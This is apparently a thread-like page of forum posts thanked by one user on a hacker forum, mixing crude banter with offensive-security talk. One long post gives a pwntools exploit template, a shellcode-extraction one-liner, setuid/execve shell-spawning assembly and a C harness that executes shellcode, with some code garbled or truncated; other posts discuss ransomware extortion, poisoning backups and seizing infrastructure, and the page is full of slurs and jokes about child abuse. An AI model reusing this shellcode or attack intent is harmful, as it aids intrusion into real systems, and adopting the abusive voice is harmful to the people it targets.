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Posts That Were Thanked by SBTlauien

  1. Originally posted by I Live In Your Crawlspace Secretly4 What if your car breaks down and you have to ask your dolphin girlfriend for her AR-15?

    There's an app for that
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. Originally posted by SBTlauien Even better…

    Have the link open that picture of the guy spreading his ass open, and then after 5 seconds redirect them to the menu.


    The following users say it would be alright if the author of this post didn't die in a fire!
  3. pEEpEEpOOpOO African Astronaut
    The following users say it would be alright if the author of this post didn't die in a fire!
  4. POLECAT POLECAT is a motherfucking ferret [my presentably immunised ammonification]
    chell reads ur posts dude.
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  5. Sophie Pedophile Tech Support
    Oh i read that wrong. The cum swapper set double l33t as password to activate the number on his end.

    Lol he got BTFO'd.

    That said, i am still open to receiving any cool MalDoc TTPs should you have some.
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  6. Sophie Pedophile Tech Support
    Originally posted by Bradley sbtlauren can you please recommend a site for someone who dones't know anything about linux/fedoras/ubuntus? I was recommended to try learning ubuntu a few months ago but kinda forgot it cuz it sounded african, until you said it again

    Learn Ubuntu here.

    Download an e-book on the Linux command line and just type in 'Download Ubuntu' at Google to get a link to an ISO file.

    Bingo bango bongo, there you go.
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  7. Originally posted by SBTlauien I have my Trident hooked up to my Television and it's very blurry looking. I've messed with different resolutions and either it's very crisp with everything very small, or it's blurry with everything the correct size.

    Can this be fixed?

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  8. aldra JIDF Controlled Opposition
    you need to set the resolution correctly then scale the font sizes up if you think they're too small
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  9. Originally posted by CutterLegendaryNinja disgusting and tasteless is that a penis as your avatar dressed up like a cat or something.

    its a mouse you retard.

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  10. Sophie Pedophile Tech Support
    Originally posted by tee hee hee Its a job for mennerds

    It's a category of careers reserved for higher IQ people. Whether you use your skills within or outside of the law. It requires at the very least solid problem solving skills, and it pays well, whether you are self-employed or work for a small or big company.

    What line of work are you in?
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  11. Sudo Black Hole [my hereto riemannian peach]
    Originally posted by vindicktive vinny thats only because the value of USD dropped.

    compare XRP to prices of say, gold or soybeans and edible oils and see what happens.

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  12. Sophie Pedophile Tech Support
    Sup niggas, i was wondering if those of you who are so inclined would be willing to share any of the utilities, resources and/or tools you like to use when working with/on automating certain aspects of low level security. Yes i already have a debugger, multiple in fact(Including Radare2, looking at you Bueno). I also have an assembler, linker, compiler and a tool for static code analysis. But that's not really the type of tool i'm looking for or talking about.

    I'm not sure if you're familiar but there's a Python tool/library that's useful in terms of exploit and payload development called pwntools. If you're interested just install it with `pip3 install pwntools`. Besides providing tools that'll let you patch ELF files from the CLI and having a built in disassembler among other things, when imported as a lib it allows you to do cool stuff like:

    from pwn import *

    # Set up pwntools for the correct architecture
    exe = './path/to/binary'

    # Many built-in settings can be controlled on the command-line and show up
    # in "args". For example, to dump all data sent/received, and disable ASLR
    # for all created processes...

    def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
    return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    return process([exe] + argv, *a, **kw)

    # Specify your GDB script here for debugging
    # GDB will be launched if the exploit is run via e.g.
    # ./ GDB
    gdbscript = '''
    # Exploit goes here

    io = start()

    # shellcode = asm(
    # payload = fit({
    # 32: 0xdeadbeef,
    # 'iaaa': [1, 2, 'Hello', 3]
    # }, length=128)
    # io.send(payload)
    # flag = io.recv(...)
    # log.success(flag)


    This is the kind of tool i'm talking about. And since i don't just want to come here hat in hand i will share some of the stuff i like to use as well. Like which lets you search for gadgets in a binary. It supports several file formats and architectures and is pretty useful for ROPChaining.

    git clone

    I also recently came across a tool called Shellnoob, which despite it's name is pretty 1337. Besides that though it's mostly very convenient because among other things it can convert between the following file types:

    Supported input: asm, obj, bin, hex, c, shellstorm
    Supported output: asm, obj, exe, bin, hex, c, completec, python, bash, ruby, pretty, safeasm

    It can also NOP out fork() calls and patch executables has interactive ASM to opcode mode, resolves syscall numbers and supports both ATT and Intel syntax. Not to mention it was accepted for Blackhat Arsenal, which gives it some serious street cred if you ask me.

    git clone

    Personally i like to keep a little cheatsheet handy in order to remember some useful Linux utilities related to what we are talking about.

    # Dump hex first 128 bytes
    xxd -l 128 <filename>

    # Dump binary first 128 bytes
    xxd -b -l 128 <filename>

    # Dump c-style header first 128 bytes at a 256-bytes offset
    xxd -i -s 256 -l 128 <filename>

    # Check relocations inside the object file
    readelf --relocs <filename>.o

    # Dump all headers
    readelf --headers <filename>

    # Dump everything
    readelf --all <filename>

    # List symbols from object file
    nm <filename>

    # List and demangle dynamic symbols from stripped object file
    nm -D --demangle <filename>

    # Get preprocessing output
    gcc -E -P <source_file>.c > <preprocessing_output>.i

    # Add current path to the linker environment
    linker=$(export LD_LIBRARY_PATH=`pwd`)

    # Trace SysCalls
    strace <filename> `ltrace -i -C <filename>`

    # Simple disassembly of an object file
    objdump -M intel -d <filename>.o

    # Extract shellcode from .sc or .o/.obj file
    objdump -d $filename | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: |cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'

    If you got anything to add to the cheatsheet, please do. That last one is particularly useful. If you take the below Assembly(ATT).

    global _start

    section .text

    ; setuid(0)
    xor edi,edi
    push rdi ; null terminator for the following string
    push 105
    pop rax
    ; push /bin//sh in reverse
    mov rbx,0xd0e65e5edcd2c45e

    ; execve
    ror rbx,1
    mov al,59
    push rbx
    xchg esi,edi
    push rsp
    ; store /bin//sh address in RDI, points at string
    pop rdi
    ; Call the Execve syscall

    Compile it with NASM like so:

    nasm -felf64 XorSh.nasm -o XorSh.o && ld XorSh.o -o XorSh

    You can now either run the compiled ELF binary `./XorSh` or extract shellcode from the object file and use it to inject it with Python, or use it as payload in a C program. If you extract the shellcode you can use the below C program to test it.

    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <sys/mman.h>

    /* should be enough to hold your shellcode, if not just set this to a higher value */
    #define BUFSIZE 4096
    /* set to 1 to enable debugging, will break before executing the shellcode */
    #define DEBUGGING 0

    /* either paste your shellcode in here ... */
    char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"

    int main(int argc, char* argv[])
    size_t len;
    char *buf, *ptr;

    printf("[*] Allocating executable memory...\n");
    ptr = buf;
    printf("[+] Buffer @ %p\n", buf);

    ptr[0] = '\xcc';

    /* ... or pass it as filename to the program */
    if (argc > 1) {
    printf("[*] Reading shellcode from file...\n");
    FILE *f = fopen(argv[1], "r");
    if (!f) {
    fprintf(stderr, "[-] Cannot open %s: %s\n", argv[1], strerror(errno));
    len = fread(ptr, 1, BUFSIZE, f);

    } else {
    len = sizeof(shellcode);
    printf("[*] Copying shellcode...\n");
    memcpy(ptr, shellcode, len);
    printf("[+] Done, size of shellcode: %i bytes\n", len);

    printf("[*] Jumping into shellcode...\n\n");
    (*(void (*)()) buf)();

    return 0;

    It would also be pretty easy to adjust the above program to just run the shellcode, but you might as well just run the ELF binary i guess. Anyway, if you have anything to add provided it's along the lines of what i posted please do so.

    If you have something really special, like a tool you coded yourself that's particularly useful with regards to this stuff. I may trade you something special in return. I have a closed source Windows tool, complete with GUI that automates finding ROPGadgets and making ROPChains, it's not for sale anywhere, and only a few people have this tool. It's excellent for exploit development targeting Windows. I will send you the source files for this tool if you have something special to trade for it.
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  13. Sophie Pedophile Tech Support
    Being just in it for the money is a sure fire way to get stuck in a job that will suck the life out of you by the way. Also, maybe you'd enjoy coding a bit more if you were making something other than a website.

    Even if you kick ass at Python and Django coding something like NIS is going to be a lot of work.
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  14. I've done charge backs a few times, the amount is immediately credited to your account while they investigate. If they rule in your favor then you keep the money...if they don't the credit is removed from your account.
    99 times out of 100 the credit card company will rule in your favor (assuming you filed a legit claim).
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  15. Sophie Pedophile Tech Support
    Originally posted by Jesus is king You should use your skills for good
    Attack israeli or chinese assets.

    I learned these skills, i decide what i do with them. That said, You've got mail.
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  16. aldra JIDF Controlled Opposition
    The following users say it would be alright if the author of this post didn't die in a fire!
  17. Sudo Black Hole [my hereto riemannian peach]
    call your company and explain and they start an investigation that usually takes a week or 2. During this time your card is frozen
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  18. Sophie Pedophile Tech Support
    Originally posted by aldra it's happened before, they won't pay.

    if you want to get paid you need to either hit small businesses and don't expect huge payouts or you have to go to the trouble of poisoning backups for a while beforehand

    Frankly, i don't care about the money. I prefer to gain operational infrastructure.
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  19. Sophie Pedophile Tech Support

    sudo apt-get install -y pwgen

    pwgen -s 32 1

    Problem solved. Also use a password manager or encryptpad at least for the love of cyber Jesus.

    Forgot to mention, there's ROMs for modern smart phones that allow you to basically have a full suite of WiFi auditing tools on them.


    Your password was dogshit.
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  20. livingelegy motherfucker [my polyoicous forward graciousness]
    You should automate your molestation of children next
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